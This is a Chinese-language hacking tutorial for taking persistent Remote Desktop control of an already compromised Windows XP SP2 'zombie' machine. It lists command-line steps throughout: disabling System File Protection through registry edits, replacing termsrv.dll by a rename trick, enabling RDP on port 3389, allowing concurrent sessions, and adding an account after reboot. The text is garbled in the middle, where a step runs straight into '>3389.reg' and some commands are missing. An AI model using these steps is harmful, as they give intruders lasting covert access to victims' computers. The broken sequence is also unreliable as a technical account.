条件:
1肉鸡是XPP2的      
2你可以上传文件    
3可以执行命令
4肉鸡重启后不会丢!(你要是有鸽子肉鸡,上面的条件很好满足的嘛!)

开工:   首先我们上传XPP2英文2055版的termsrv.dll文件,上传到C盘下, 然后干掉XP的系统文件保护,修改他的注册表(防止我们修改文件时弹出提示框来)   echo Windows Registry Editor Version 5.00>>20.reg   echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]>>20.reg   echo SFCDisable=dword:ffffff9d>>20.reg     命令regedit /s 20.reg导入注册表   命令del 20.reg 删除   现在来替换文件(termsrv.dll文件系统里有2个,一个在dllcache文件夹里,一个在system32文件夹里   我们都替换掉)   命令:copy c:/termsrv.dll c:/windows/system32/dllcache/termsrv.dll     这个命令不用解释了吧,命令执行后有个提示,问你是否修改termsrv.dll文件,因为dllcache文件夹里有   一个termsrv.dll文件,选Y回车就可以了   再来替换system32下的termsrv.dll文件,你要是还直接还使用copy命令,肯定失败.提示文件在使用中.   我们来利用win系统的特性修改它,使用中的系统文件可以改名.   切换到system32目录   命令:rename termsrv.dll ter.dll   这个命令是把termsrv.dll文件改名为ter.dll>3389.reg   echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>3389.reg   echo fDenyTSConnections=dword:00000000>>3389.reg   echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>3389.reg   echo PortNumber=dword:00000D3D>>3389.reg   echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>3389.reg   echo PortNumber=dword:000000D3D>>3389.reg   命令 regedit /s 3389.reg导入注册表   命令 del 3389.reg 删除     检查一下   命令: netstat -an |find 3389   看看是否打开终端端口   最后还要修改注册表才能多用户登陆:   echo Windows Registry Editor Version 5.00>>21.reg   echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Licensing Core]>>21.reg   echo EnableConcurrentSessions=dword:00000001>>21.reg  命令regedit /s 21.reg导入注册表   命令del 21.reg 删除   重启肉鸡,肉鸡重启后,就会加载我们的termsrv.dll文件,(它原来的被我们改名了..嘎嘎)   等待肉鸡上线,就可以登陆了(不要忘了加个帐号哟)。